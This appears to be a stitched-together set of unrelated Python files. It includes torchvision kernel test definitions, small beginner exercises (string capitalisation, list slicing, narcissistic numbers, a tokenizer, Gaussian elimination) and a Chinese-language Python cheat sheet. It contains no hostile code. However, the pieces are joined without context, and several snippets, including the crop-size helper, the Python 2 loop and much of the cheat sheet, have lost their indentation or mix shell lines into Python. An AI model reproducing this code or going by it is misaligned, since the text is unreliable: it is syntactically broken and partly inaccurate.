    for image_loader in make_image_loaders(sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE], color_spaces=("GRAY", "RGB")):
        yield ArgsKwargs(image_loader, hue_factor=_ADJUST_HUE_FACTORS[0])


def reference_inputs_adjust_hue_image_tensor():
    """Inputs exercising every hue factor against the PIL reference."""
    for image_loader, hue_factor in itertools.product(
        make_image_loaders(color_spaces=("GRAY", "RGB"), extra_dims=[()], dtypes=[torch.uint8]),
        _ADJUST_HUE_FACTORS,
    ):
        yield ArgsKwargs(image_loader, hue_factor=hue_factor)


def sample_inputs_adjust_hue_video():
    """Sample inputs for F.adjust_hue_video."""
    for video_loader in make_video_loaders(sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE], num_frames=[3]):
        yield ArgsKwargs(video_loader, hue_factor=_ADJUST_HUE_FACTORS[0])


# Register the adjust-hue kernels.
KERNEL_INFOS.extend(
    [
        KernelInfo(
            F.adjust_hue_image,
            kernel_name="adjust_hue_image_tensor",
            sample_inputs_fn=sample_inputs_adjust_hue_image_tensor,
            reference_fn=pil_reference_wrapper(F._adjust_hue_image_pil),
            reference_inputs_fn=reference_inputs_adjust_hue_image_tensor,
            float32_vs_uint8=True,
            closeness_kwargs={
                **pil_reference_pixel_difference(2, mae=True),
                **float32_vs_uint8_pixel_difference(),
            },
        ),
        KernelInfo(
            F.adjust_hue_video,
            sample_inputs_fn=sample_inputs_adjust_hue_video,
        ),
    ]
)
# Saturation factors exercised by the tests.
_ADJUST_SATURATION_FACTORS = [0.1, 0.5]


def sample_inputs_adjust_saturation_image_tensor():
    """Sample inputs for F.adjust_saturation_image."""
    for image_loader in make_image_loaders(sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE], color_spaces=("GRAY", "RGB")):
        yield ArgsKwargs(image_loader, saturation_factor=_ADJUST_SATURATION_FACTORS[0])


def reference_inputs_adjust_saturation_image_tensor():
    """Inputs exercising every saturation factor against the PIL reference."""
    for image_loader, saturation_factor in itertools.product(
        make_image_loaders(color_spaces=("GRAY", "RGB"), extra_dims=[()], dtypes=[torch.uint8]),
        _ADJUST_SATURATION_FACTORS,
    ):
        yield ArgsKwargs(image_loader, saturation_factor=saturation_factor)


def sample_inputs_adjust_saturation_video():
    """Sample inputs for F.adjust_saturation_video."""
    for video_loader in make_video_loaders(sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE], num_frames=[3]):
        yield ArgsKwargs(video_loader, saturation_factor=_ADJUST_SATURATION_FACTORS[0])


# Register the adjust-saturation kernels.
KERNEL_INFOS.extend(
    [
        KernelInfo(
            F.adjust_saturation_image,
            kernel_name="adjust_saturation_image_tensor",
            sample_inputs_fn=sample_inputs_adjust_saturation_image_tensor,
            reference_fn=pil_reference_wrapper(F._adjust_saturation_image_pil),
            reference_inputs_fn=reference_inputs_adjust_saturation_image_tensor,
            float32_vs_uint8=True,
            closeness_kwargs={
                **pil_reference_pixel_difference(),
                **float32_vs_uint8_pixel_difference(2),
                **cuda_vs_cpu_pixel_difference(),
            },
        ),
        KernelInfo(
            F.adjust_saturation_video,
            sample_inputs_fn=sample_inputs_adjust_saturation_video,
            closeness_kwargs=cuda_vs_cpu_pixel_difference(),
        ),
    ]
)
def sample_inputs_clamp_bounding_boxes():
    """Sample inputs for F.clamp_bounding_boxes."""
    for bounding_boxes_loader in make_bounding_box_loaders():
        yield ArgsKwargs(
            bounding_boxes_loader,
            format=bounding_boxes_loader.format,
            canvas_size=bounding_boxes_loader.canvas_size,
        )


KERNEL_INFOS.append(
    KernelInfo(
        F.clamp_bounding_boxes,
        sample_inputs_fn=sample_inputs_clamp_bounding_boxes,
        logs_usage=True,  # NOTE(review): presumably enables the API usage-logging check — confirm
    )
)
# Crop sizes (scalar, 1-, and 2-element sequences) exercised by five/ten-crop tests.
_FIVE_TEN_CROP_SIZES = [7, (6,), [5], (6, 5), [7, 6]]
def _get_five_ten_crop_canvas_size(size):
if isinstance(size, int):
crop_height = crop_width = size
elif len(size) == 1:
crop_height = crop_width = size[0]
else:
crop_height, crop_width = size
return 2 * crop_height, 2 * crop_width
def sample_inputs_five_crop_image_tensor():
    """Sample inputs for F.five_crop_image; the canvas is always 2x the crop size."""
    for size in _FIVE_TEN_CROP_SIZES:
        for image_loader in make_image_loaders(
            sizes=[_get_five_ten_crop_canvas_size(size)],
            color_spaces=["RGB"],
            dtypes=[torch.float32],
        ):
            yield ArgsKwargs(image_loader, size=size)


def reference_inputs_five_crop_image_tensor():
    """Inputs for comparing against the PIL five-crop reference."""
    for size in _FIVE_TEN_CROP_SIZES:
        for image_loader in make_image_loaders(
            sizes=[_get_five_ten_crop_canvas_size(size)], extra_dims=[()], dtypes=[torch.uint8]
        ):
            yield ArgsKwargs(image_loader, size=size)


def sample_inputs_five_crop_video():
    """Sample inputs for F.five_crop_video."""
    size = _FIVE_TEN_CROP_SIZES[0]
    for video_loader in make_video_loaders(sizes=[_get_five_ten_crop_canvas_size(size)]):
        yield ArgsKwargs(video_loader, size=size)


def sample_inputs_ten_crop_image_tensor():
    """Sample inputs for F.ten_crop_image, with and without vertical flip."""
    for size, vertical_flip in itertools.product(_FIVE_TEN_CROP_SIZES, [False, True]):
        for image_loader in make_image_loaders(
            sizes=[_get_five_ten_crop_canvas_size(size)],
            color_spaces=["RGB"],
            dtypes=[torch.float32],
        ):
            yield ArgsKwargs(image_loader, size=size, vertical_flip=vertical_flip)


def reference_inputs_ten_crop_image_tensor():
    """Inputs for comparing against the PIL ten-crop reference."""
    for size, vertical_flip in itertools.product(_FIVE_TEN_CROP_SIZES, [False, True]):
        for image_loader in make_image_loaders(
            sizes=[_get_five_ten_crop_canvas_size(size)], extra_dims=[()], dtypes=[torch.uint8]
        ):
            yield ArgsKwargs(image_loader, size=size, vertical_flip=vertical_flip)


def sample_inputs_ten_crop_video():
    """Sample inputs for F.ten_crop_video."""
    size = _FIVE_TEN_CROP_SIZES[0]
    for video_loader in make_video_loaders(sizes=[_get_five_ten_crop_canvas_size(size)]):
        yield ArgsKwargs(video_loader, size=size)
def multi_crop_pil_reference_wrapper(pil_kernel):
    """Like ``pil_reference_wrapper``, but for kernels returning multiple images.

    five_crop/ten_crop return a sequence of crops, so every PIL output is
    converted back to a tensor of the input's dtype individually.
    """
    def wrapper(input_tensor, *other_args, **kwargs):
        output = pil_reference_wrapper(pil_kernel)(input_tensor, *other_args, **kwargs)
        return type(output)(
            F.to_dtype_image(F.to_image(output_pil), dtype=input_tensor.dtype, scale=True) for output_pil in output
        )

    return wrapper


# Marks shared by all five/ten-crop kernels: JIT rejects scalar ``size`` and the
# multi-crop output shape needs custom batching in the common tests.
_common_five_ten_crop_marks = [
    xfail_jit_python_scalar_arg("size"),
    mark_framework_limitation(("TestKernels", "test_batched_vs_single"), "Custom batching needed."),
]
# Register the five/ten-crop kernels.
KERNEL_INFOS.extend(
    [
        KernelInfo(
            F.five_crop_image,
            sample_inputs_fn=sample_inputs_five_crop_image_tensor,
            reference_fn=multi_crop_pil_reference_wrapper(F._five_crop_image_pil),
            reference_inputs_fn=reference_inputs_five_crop_image_tensor,
            test_marks=_common_five_ten_crop_marks,
        ),
        KernelInfo(
            F.five_crop_video,
            sample_inputs_fn=sample_inputs_five_crop_video,
            test_marks=_common_five_ten_crop_marks,
        ),
        KernelInfo(
            F.ten_crop_image,
            sample_inputs_fn=sample_inputs_ten_crop_image_tensor,
            reference_fn=multi_crop_pil_reference_wrapper(F._ten_crop_image_pil),
            reference_inputs_fn=reference_inputs_ten_crop_image_tensor,
            test_marks=_common_five_ten_crop_marks,
        ),
        KernelInfo(
            F.ten_crop_video,
            sample_inputs_fn=sample_inputs_ten_crop_video,
            test_marks=_common_five_ten_crop_marks,
        ),
    ]
)
# (mean, std) pairs covering per-channel tuples, lists, and scalar broadcast.
_NORMALIZE_MEANS_STDS = [
    ((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)),
    ([0.0, 0.0, 0.0], [1.0, 1.0, 1.0]),
    (0.5, 2.0),
]


def sample_inputs_normalize_image_tensor():
    """Sample inputs for F.normalize_image (float images only)."""
    for image_loader, (mean, std) in itertools.product(
        make_image_loaders(sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE], color_spaces=["RGB"], dtypes=[torch.float32]),
        _NORMALIZE_MEANS_STDS,
    ):
        yield ArgsKwargs(image_loader, mean=mean, std=std)
def reference_normalize_image_tensor(image, mean, std, inplace=False):
    """Reference implementation of normalize: ``(image - mean) / std`` per channel."""
    mean_t = torch.tensor(mean).view(-1, 1, 1)
    std_t = torch.tensor(std).view(-1, 1, 1)
    # In-place subtraction mutates ``image``; otherwise a fresh tensor is produced,
    # which div_ may then safely mutate.
    shifted = image.sub_(mean_t) if inplace else image.sub(mean_t)
    return shifted.div_(std_t)
def reference_inputs_normalize_image_tensor():
    """Single deterministic input for checking against the reference implementation."""
    yield ArgsKwargs(
        make_image_loader(size=(32, 32), color_space="RGB", extra_dims=[1]),
        mean=[0.5, 0.5, 0.5],
        std=[1.0, 1.0, 1.0],
    )


def sample_inputs_normalize_video():
    """Sample inputs for F.normalize_video (float videos only)."""
    mean, std = _NORMALIZE_MEANS_STDS[0]
    for video_loader in make_video_loaders(
        sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE], color_spaces=["RGB"], num_frames=[3], dtypes=[torch.float32]
    ):
        yield ArgsKwargs(video_loader, mean=mean, std=std)


# Register the normalize kernels. JIT rejects scalar mean/std arguments.
KERNEL_INFOS.extend(
    [
        KernelInfo(
            F.normalize_image,
            kernel_name="normalize_image_tensor",
            sample_inputs_fn=sample_inputs_normalize_image_tensor,
            reference_fn=reference_normalize_image_tensor,
            reference_inputs_fn=reference_inputs_normalize_image_tensor,
            test_marks=[
                xfail_jit_python_scalar_arg("mean"),
                xfail_jit_python_scalar_arg("std"),
            ],
        ),
        KernelInfo(
            F.normalize_video,
            sample_inputs_fn=sample_inputs_normalize_video,
        ),
    ]
)
def sample_inputs_uniform_temporal_subsample_video():
    """Sample inputs for F.uniform_temporal_subsample_video (4 frames -> 2)."""
    for video_loader in make_video_loaders(sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE], num_frames=[4]):
        yield ArgsKwargs(video_loader, num_samples=2)
def reference_uniform_temporal_subsample_video(x, num_samples):
    """Evenly subsample ``num_samples`` frames along the temporal (-4) dimension.

    Copy-pasted from
    https://github.com/facebookresearch/pytorchvideo/blob/c8d23d8b7e597586a9e2d18f6ed31ad8aa379a7a/pytorchvideo/transforms/functional.py#L19
    """
    num_frames = x.shape[-4]
    assert num_samples > 0 and num_frames > 0
    # linspace + clamp gives nearest-neighbor frame indices; frames repeat when
    # num_samples exceeds the number of available frames.
    frame_indices = torch.linspace(0, num_frames - 1, num_samples).clamp(0, num_frames - 1).long()
    return x.index_select(-4, frame_indices)
def reference_inputs_uniform_temporal_subsample_video():
    """Exercise every valid num_samples value for a 10-frame video."""
    for video_loader in make_video_loaders(
        sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE], color_spaces=["RGB"], num_frames=[10]
    ):
        for num_samples in range(1, video_loader.shape[-4] + 1):
            yield ArgsKwargs(video_loader, num_samples)


KERNEL_INFOS.append(
    KernelInfo(
        F.uniform_temporal_subsample_video,
        sample_inputs_fn=sample_inputs_uniform_temporal_subsample_video,
        reference_fn=reference_uniform_temporal_subsample_video,
        reference_inputs_fn=reference_inputs_uniform_temporal_subsample_video,
    )
)
|
if __name__ == '__main__':
s = "chris alan"
a = s.split(' ')
r = ''
for p in a:
r += ' ' + p.capitalize()
print(r[1:])
|
#coding:gb2312
# Slice exercise and for-loop review.
fruits=['banana','watermelon','apple','strawberry','orange']
friend_fruits=fruits[:]  # a full slice makes an independent copy of the list
fruits.append('litchi')
friend_fruits.append('peach')  # each list gets its own extra item
print("My favorite fruits are :")
for items in fruits:
    print(items)
print(fruits)
print("\nMy friend favorite fruits are :")
for items in friend_fruits:
    print(items)
print(friend_fruits)
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
"""
题目:打印出所有的"水仙花数",所谓"水仙花数"是指一个三位数,其各位数字立方和等于该数本身。
例如:153是一个"水仙花数",因为153=1的三次方+5的三次方+3的三次方。
程序分析:利用for循环控制100-999个数,每个数分解出个位,十位,百位。。
"""
print
for i in range(100, 1000, 1):
x = i / 100
y = i / 10 % 10
z = i % 10
# print z, y, z, i
if i == x**3 + y**3 + z**3:
print x, y, z, i
|
import sys
def tokenize(file_name):
    """Converts text file to list of tokens.

    Params: file_name - file to be tokenized
    str -> list

    Splits on any whitespace, so a trailing newline no longer causes data
    loss: the old ``split(" ")`` + unconditional ``pop()`` silently discarded
    the final token of the file. The file is now also closed deterministically
    via a context manager.
    """
    with open(file_name) as file:
        return file.read().split()
if __name__ == "__main__":
    # Tokenize the file named on the command line, then report its tokens and count.
    tokens = tokenize(sys.argv[1])
    print(tokens)
    print(len(tokens))
|
import numpy as np

# Gaussian elimination with partial pivoting for the 4x4 system A·X = B.
A = np.array([[4,-1,-1,0],
              [-1,4,0,-1],
              [-1,0,4,-1],
              [0,-1,-1,4]])
B = np.array([[30],
              [60],
              [40],
              [70]])
# Tolerance for treating values as zero.
# NOTE(review): currently unused anywhere below — confirm whether it can be removed.
casicero = 1e-15
# Avoid integer truncation: force a floating-point dtype before elimination.
A = np.array(A, dtype=float)
AB = np.concatenate((A, B), axis=1)  # augmented matrix [A | B]
AB0 = np.copy(AB)  # keep the original augmented matrix for display
# Partial pivoting by rows
tamano = np.shape(AB)
n = tamano[0]  # number of rows/unknowns
m = tamano[1]  # number of columns of the augmented matrix (n + 1)
# For each row in AB: swap in the row with the largest absolute pivot candidate.
for i in range(0, n - 1, 1):
    columna = abs(AB[i:, i])
    dondemax = np.argmax(columna)  # index relative to row i
    if (dondemax != 0):
        temporal = np.copy(AB[i, :])
        AB[i, :] = AB[dondemax + i, :]
        AB[dondemax + i, :] = temporal
AB1 = np.copy(AB)  # snapshot after pivoting, for display
# Forward elimination: zero out everything below each pivot.
for i in range(0, n - 1, 1):
    pivote = AB[i, i]
    adelante = i + 1
    for k in range(adelante, n, 1):
        factor = AB[k, i] / pivote
        AB[k, :] = AB[k, :] - AB[i, :] * factor
# Back substitution, from the last row upwards.
ultfila = n - 1
ultcolumna = m - 1
X = np.zeros(n, dtype=float)
for i in range(ultfila, 0 - 1, -1):
    suma = 0
    for j in range(i + 1, ultcolumna, 1):
        suma = suma + AB[i, j] * X[j]
    b = AB[i, ultcolumna]
    X[i] = (b - suma) / AB[i, i]
X = np.transpose([X])  # present the solution as a column vector
print('')
print('Matriz solución:')
print('')
print(AB0)
print('')
print('Pivoteo parcial por filas')
print('')
print(AB1)
print('')
print('eliminación progresiva')
print('')
print(AB)
print('')
print('solución: ')
print('')
print(X)
print('')
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date : 2017-12-08
# @Author : ${author} (${email})
# @Link : ${link}
# @Version : $Id$
计算机管理 compmgmt.msc
计算机服务 services.msc
管理员启动命令行 runas /user:administrator cmd
设置任务计划模块自动运行 sc config schedule start= auto
启动任务计划程序 taskschd.msc /s
pip install -U pip
pip list --outdated
pip search libname
pip install pkg -i https://pypi.tuna.tsinghua.edu.cn/simple/
=====================================================
pyinstaller -F/-D myfile.py #形成一个exe还是形成很多依赖文件,后者兼容性更好
-i myicon.ico -p packagepath
-w/-c # window/console
-n #为生成的exe起个名字
--key # 加密打包
pyi-makespec -F myfile.py # 生成spec文件
'''
RecursionError: maximum recursion depth exceeded
打开 myfile.spec 添加
import sys
sys.setrecursionlimit(1000000)
再次执行 pyinstaller -F myfile.spec -i myicon.ico
'''
# setup.py
# cython: language_level=3
from distutils.core import setup
from Cython.Build import cythonize
setup(
name='reconciliation',
ext_modules = cythonize('main.py')
)
$ python setup.py build_ext --inplace
=====================================================
# 列出
conda env list
# 创建
conda create -n your_env_name python=X.X #(2.7,3.6)
# 激活
Linux: source activate your_env_name(虚拟环境名称)
Windows: activate your_env_name(虚拟环境名称)
# 安装包
conda install -n your_env_name packagename
# 关闭
Linux: source deactivate
Windows: deactivate
# 删除
conda remove -n your_env_name --all
#---env----
python3 -m venv tutorial-env
#在Windows上,运行:
tutorial-env\Scripts\activate.bat
#在Unix或MacOS上,运行:
source tutorial-env/bin/activate
#退出
deactivate
========================================================
import pip
from subprocess import call
for dist in pip.get_installed_distributions():
call("pip install -U " + dist.project_name,shell=True)
conda:
添加清华源
conda config --add channels https://mirrors.tuna.tsinghua.edu.cn/anaconda/pkgs/free/
conda config --add channels https://mirrors.tuna.tsinghua.edu.cn/anaconda/pkgs/main/
更新所有包
conda update --all
jupyter config:
jupyter notebook --generate-config
pip install jupyter_contrib_nbextensions
jupyter contrib nbextension install --user
pip install jupyterthemes
jt -t monokai -fs 12 -T -N -tf ubuntu -tfs -10 -dfs 8 -ofs 10 -cellw 80% -lineh 130 -cursw 3
=======================遍历循环===================================
tups = {"name": "mengmeng", "looks": "beautiful", "age": 24}
for a, b in tups.items():
print("%s:%s" % (a, b))
student = ["xiaomeng", "xiaozhi", "xiaoqiang"]
number = ["1002", "1003", "1004"]
for i in range(len(student)):
print(student[i], "的学号是: ", number[i])
for a, b in zip(student, number):
print(a, "的学号是: ", b)
========================函数========================================
# 定义阶乘函数-------------------------------------------------
def fact_iter(x, y):
if x == 1:
return y
return fact_iter(x - 1, x * y)
def fact(n):
return fact_iter(n, 1)
# 匿名函数------------------------------------------------------
c = lambda x, y=10: y**x
print([i for i in filter(lambda x: x > 3, [1, 2, 3, 4, 5])])
========================类======================================
class Student(object):
def __init__(self, name, score): # 类中的构造方法__init__(初始化)
self.__name = name # 类的属性(私有变量)
self.__score = score # 类的属性(私有变量)
def info(self): # 类中的非构造方法
print("学生:%s;分数:%s" % (self.__name, self.__score))
def get_score(self): #定义方法:可以外部访问私有变量
return self.__score
def modify_score(self,score): #定义方法:可以外部修改私有变量
if score in range(0,100): #为什么还是能改成105也不提示???
self.__score = score
else:
print("分数应该是0到100的数字")
stu = Student("小萌",95) #类的实例化
stu.info() #通过实例变量引用类中方法info()
print(stu.get_score()) #通过定义的方法访问私有变量
stu.modify_score(59) #通过定义的方法修改私有变量
print(stu.get_score())
# 多重继承----------------------------------------------------
class Animal(object):
pass
class Mammal(Animal):
pass
class Bird(Animal):
pass
class Dog(Mammal):
pass
class Bat(Mammal):
pass
class Parrot(Bird):
pass
class Ostrich(Bird):
pass
class Runnable(object):
def run(self):
print("running")
class Flyable(object):
def fly(self):
print("flying")
class Dog(Mammal,Runnable):
pass
class Bat(Mammal,Flyable):
pass
class type_dect(object):
def __str__(self):
return "地上跑的动物"
__repr__=__str__
========================异常======================================
#try/except/else/finally的组合使用
def a_divid_b(a,b):
try:
c = a/b
except (ZeroDivisionError,SyntaxError,NameError) as e:
raise
print (e)
else:
return c
finally: #不是说finally子句最后执行吗?结果好像不是??
print("this is a error capture programming")
a_divid_b(2, 1)
a_divid_b(2, 0)
======================时间和日期====================================
%a 简化星期名称 %m 月份
%A 完整星期名称 %M 分钟
%b 简化月份名称 %S 秒数
%B 完整月份名称 %y 去掉世纪的年份
%d 一个月中的天数 %Y 完整年份
%H 一天中的小时数 %F %Y-%m-%d的简写形式
%w 一星期中的第几天(0是星期天) %D %m-%d-%y的简写形式
%W 一星期中的第几天(0是星期一)
import time,datetime,calendar
# 对象为时间戳--------
time.time() #时间戳
time.localtime() #本地时间
time.gmtime() #0时区时间(UTC)
time.ctime() #将时间戳转化为'Sat Dec 9 22:00:12 2017'
# 对象为时间元组struct_time--------
t = time.localtime() #本地时间形成的元组
time.mktime(t)#转化为时间戳
time.asctime(t) #'Sat Dec 9 22:00:12 2017'
time.strftime("%Y-%m-%d", t) #返回以字符串表示的时间strftime(format,tuple)
time.strptime("Sat Dec 9 22:00:12 2017", "%a %b %d %H:%M:%S %Y") #将字符串时间转化为时间元组
# 功能型时间函数
clock()#返回进程时间
time.sleep()#延迟时间
#datetime模块----------------
datetime.datetime.today()
datetime.datetime.now(tz)
datetime.timedelta(hours=3)#默认3天
# ......
dt=datetime.datetime.now()
dt.strftime("%Y-%m-%d %H:%M:%S")
#regex--------------
import re
re.match("hello", "hello world").span()
========================文件操作======================================
# 打开文件--
open("path","w+","buffering",encoding="utf-8")
# 读取文件--
open().read("byte")
open().readline(" ")
open().readlines(list) #读取对象为列表
# 写入文件--
open().write("byte")
open().writeline(" ")
open().writelines(list) #写入对象为列表
# 关闭文件--
open().close()
with open() as f:
open().write(" ") #with自动调用close(),替代try/finally复杂命令
#文件重命名和删除--
os.rename(old,new)
os.remove(" ")
#文件内容迭代----
file = open("path")
while True:
txt = file.read(1) #按字节迭代,txt = file.readline(1)->按行迭代
if not txt:
break
print(txt)
file.close()
#懒加载式迭代-for循环----
import fileinput
for line in fileinput.input(path):
print (line)
#StringIO()函数----
from io import StringIO
io_str = StringIO("Hello\nWorld\nWelcome")
while True:
line = io_str.readline()
if line =="":
break
print(line.strip())
StringIO().write("")
StringIO().readline()
StringIO().getvalue()
===================序列化与反序列化====================================
------python独有---------------
import pickle
# 内存->文件:pickle.dump()/pickle.dumps()-后者先读取为bytes.
dic =dict(name="萌萌",num=6017)
pickle.dumps(dic) #将数据通过特殊的形式转化为只有python语言认识的字符串
pickle.dump(dic) #将数据通过特殊的形式转化为只有python语言认识的字符串,并写入文件
try:
file1 = open("./Files/Pyfiles/dump.txt","wb")
pickle.dump(dic,file1)
finally:
file1.close()
# 文件->内存:pickle.load()/pickle.loads()-后者先读取为bytes.
try:
file1 = open("./Files/Pyfiles/dump.txt","rb")
pickle.load(file1)
finally:
file1.close()
------通用JSON序列化--------------
#处理的是字符串--
json.dumps()--序列化(编码) #将数据通过特殊的形式转化为所有程序语言都认识的字符串
json.loads()--反序列化(解码)
# 处理的是文件--
json.dump() #将数据通过特殊的形式转化为所有程序语言都认识的字符串,并写入文件
json.load()
import json
dic =dict(name="萌萌",num=6017)
json_dstr=json.dumps(dic)
print(json_dstr)
json_lstr=json.loads(json_dstr)
print(json_lstr)
repr() # 接收任何对象返回字符串的表达形式
=======================字符串操作===============================
all([1,-5,3])#判断列表或元组所有元素非零返回True
any([]) #只要有一个元素非零,则返回True,全部为零返回False
------
name = "my \tname is {name} and i am {year} old"
name.capitalize() #大写
name.count("a") #计数
name.center(50,"-") #字符串居中,总长度50,不足处以-代替
name.ljust(50,'*') #字符串居左,总长度50,不足处以*代替
name.rjust(50,'-') #字符串居右,总长度50,不足处以-代替
name.endswith("ex") #以ex结尾
name.expandtabs(tabsize=30)#以tab隔开,tab长度为30
name.find("name") #查找name所在位置
name.format(name='alex',year=23)
name.format_map({'name':'alex','year':12})
-------
'ab23'.isalnum() #判断是否字母和数字
'abA'.isalpha() #判断是否是字母
'1A'.isdigit() #判断是否是数字
'My Name Is '.istitle() #判断是否首字母均大写(标题)
'My Name Is '.isupper() #判断是否大写
'+'.join( ['1','2','3']) #以+进行连接
'Alex'.lower() #小写
'Alex'.upper() #大写
' Alex\n'.strip() #去除空白
'\nAlex'.lstrip() #去除左空白
'Alex\n'.rstrip() #去除右空白
-------
p = str.maketrans("abcdefli",'123$@456') #生成对应规则
"alex li".translate(p) #按照对应规则翻译
-------
'alex li'.replace('l','L',1) #字符替换
'alex lil'.rfind('l') #从右开始查找位置
'1+2+3+4'.split('+') #按+分割,返回列表
'1+2\n+3+4'.splitlines() #按行分割
'Alex Li'.swapcase() #大小写互相转换
'lex li'.title() #首字母大写
'lex li'.zfill(50) #长度50,不足处以zero代替?
'1A'.isdecimal()
'a 1A'.isidentifier()#判读是不是一个合法的标识符
'33A'.isnumeric() #判断是否是整数?
=======================集合操作=======================================
list_1 = [1,4,5,7,3,6,7,9]
set_1 = set(list_1)
set_2 =set([2,6,0,66,22,8,4])
print(set_1,set_2)
---交集---
print(set_1.intersection(set_2))
print(set_1 & set_2)
---并集---
print(set_1.union(set_2))
print(set_2 | set_1)
---差集---
print(set_1.difference(set_2)) #在集合1中而不在集合2中
print(set_2.difference(set_1)) #在集合2中而不在集合1中
print(set_1 - set_2)
---子集---
set_3 = set([1,3,7])
print(set_3.issubset(set_1)) #判断集合3是否是集合1的子集
print(set_1.issuperset(set_3)) #判断集合1是否是集合3的超集
---对称差集---
print(set_1.symmetric_difference(set_2)) #去掉共同元素,返回一个互异元素集合
print(set_1 ^ set_2)
---交集判断---
set_4 = set([5,6,7,8])
print(set_3.isdisjoint(set_4)) #判断集合3与集合4是否有交集,无交集返回True
---增加集合元素---
set_1.add(999)
set_1.update([888,777,555])
print(set_1)
---删除集合元素---
set_1.pop() #出栈,即去掉末尾元素
set_1.discard(888)
============================内置模块====================================
---------re---------
#基本语法
'.' #默认匹配除\n之外的任意一个字符,若指定flag DOTALL,则匹配任意字符,包括换行
'^' #匹配字符开头,若指定flags MULTILINE,这种也可以匹配上(r"^a","\nabc\neee",flags=re.MULTILINE)
'$' #匹配字符结尾,或re.search("foo$","bfoo\nsdfsf",flags=re.MULTILINE).group()也可以
'*' #匹配*号前的字符0次或多次,re.findall("ab*","cabb3abcbbac") 结果为['abb', 'ab', 'a']
'+' #匹配前一个字符1次或多次,re.findall("ab+","ab+cd+abb+bba") 结果['ab', 'abb']
'?' #匹配前一个字符1次或0次
'{m}' #匹配前一个字符m次
'{n,m}' #匹配前一个字符n到m次,re.findall("ab{1,3}","abb abc abbcbbb") 结果'abb', 'ab', 'abb']
'|' #匹配|左或|右的字符,re.search("abc|ABC","ABCBabcCD").group() 结果'ABC'
'[...]' #用来表示一组字符,如[abc]用来匹配a,b或者c
'[^...]'#不在[]中的字符:[^abc] 匹配除了a,b,c之外的字符。
'(?iLmsux[:re])' #指定编译选项,可添加-号表示关闭如(?-i)。
#但注意选项的有效范围是整条规则,即写在规则的任何地方,选项都会对全部整条正则式有效。
# i = IGNORECASE ;
# L = LOCAL ;
# m = MULTILINE ;
# s = DOTALL ;
# u = UNICODE ;
# x = VERBOSE 。
'(?# )' #注释。(?# )之间的内容将被忽略。
'(?<=…)' #前向界定,后向搜索 注:不可以在前向界定的括号里写正则式
#括号中 … 代表希望匹配的字符串的前面应该出现的字符串。
'(?=…)' #后向界定,前向搜索 注:可以在后向界定写正则式
#括号中的 …代表希望匹配的字符串后面应该出现的字符串。
'(?<!...)' # 前向非界定
# 当希望的字符串前面不是'…'的内容时才匹配
'(?!...)' #后向非界定
#当希望的字符串后面不跟着…内容时才匹配。
'*?' '+?' '??' #加?表示最小匹配,即懒惰
'\A' #只从字符开头匹配,re.search("\Aabc","alexabc") 是匹配不到的
'\Z' #匹配字符结尾,同$
'\d' #匹配数字0-9
'\D' #匹配非数字
'\w' #匹配[A-Za-z0-9]
'\W' #匹配非[A-Za-z0-9]
'\s' #匹配空白字符、\t、\n、\r , re.search("\s+","ab\tc1\n3").group() 结果 't'
'\S' #匹配任意非空字符
'\G' #匹配最后匹配完成的位置
'\b' #匹配一个单词边界,也就是指单词和空格间的位置。例如,'er\b' 可以匹配"never" 中的 'er',但不能匹配 "verb" 中的 'er'。
# '\b左边界.*右边界\b' \b可以就理解为空格位置
'\B' #匹配非单词边界。'er\B' 能匹配 "verb" 中的 'er',但不能匹配 "never" 中的 'er'。
'\1...\9'#匹配第n个分组的子表达式。
'组的用法'
'(...)' #无命名组
#re.search("(abc){2}a(123|456)c", "abcabca456c").group() 结果 abcabca456c
'(?P<name>...)' #命名组
'''分组匹配 re.search("(?P<province>[0-9]{4})(?P<city>[0-9]{2})(?P<birthday>[0-9]{4})",
"371481199306143242").groupdict("city")
结果{'province': '3714', 'city': '81', 'birthday': '1993'}'''
'(?P=name)' #命名组的调用
'\number' #通过序号调用已匹配的组,每个组都有一个序号,从左到右从1开始.0号组为整个正则式本身。
'(?: re)' #类似 (...), 但是不表示一个组,称为无捕获组
'(?(group_id/name)yes-pattern|no-pattern)'#条件匹配功能。判断指定组是否已匹配,执行相应的规则。
'注意:'
# re.search((...).+(...)).group(id|name) 是懒惰查找,返回包含组信息的第一个结果,即默认0组
# re.search((...).+(...)).groups() 也是懒惰查找,只返回第一个匹配结果的组信息
# re.findall((...).+(...)) 全查找,但只返回组信息
"关于 '|' 要注意两点:"
#第一,它在'[]'之中不再表示或,而表示他本身的字符。
#第二,它的有效范围是它两边的整条规则,比如'dog|cat'匹配的是'dog'和'cat',而不是'g'和'c'。
#如果想限定它的有效范围,必需使用一个无捕获组'(?: )'包起来。
#比如要匹配 'I have a dog'或'I have a cat',需要写成
# r'I have a (?:dog|cat)’,而不能写成 r'I have a dog|cat'
#最常用的匹配语法
re.match() #从头开始匹配
re.match().group([index|id]) #获取匹配的组,缺省返回组 0, 也就是全部值
re.match().groups() # 返回全部的组
re.compile().groupdict() #返回以组名为key,匹配的内容为 values 的字典
re.search() #匹配包含
re.search().start()
re.search().end()
re.search().expand(template) #根据一个模版用找到的内容替换模版里的相应位置
re.findall() #把所有匹配到的字符放到列表中返回
re.split() #以匹配到的字符当做列表分隔符
re.sub() #匹配字符并替换
re.subn() #匹配字符串并替换,同时会返回替换次数
re.escape(r'(*+?)') #跳过re的符号功能,表示其本身.
re.compile(pattern)
re.compile().flags
re.compile().pattern
re.compile().groupindex
#反斜杠的困扰
'''与大多数编程语言相同,正则表达式里使用"\"作为转义字符,这就可能造成反斜杠困扰。
假如你需要匹配文本中的字符"\",那么使用编程语言表示的正则表达式里将需要4个反斜杠"\\\\":
前两个和后两个分别用于在编程语言里转义成反斜杠,转换成两个反斜杠后再在正则表达式里转义成一个反斜杠。
Python里的原生字符串很好地解决了这个问题,这个例子中的正则表达式可以使用r"\\"表示。
同样,匹配一个数字的"\\d"可以写成r"\d"。有了原生字符串,你再也不用担心是不是漏写了反斜杠,
写出来的表达式也更直观。'''
#匹配模式flags
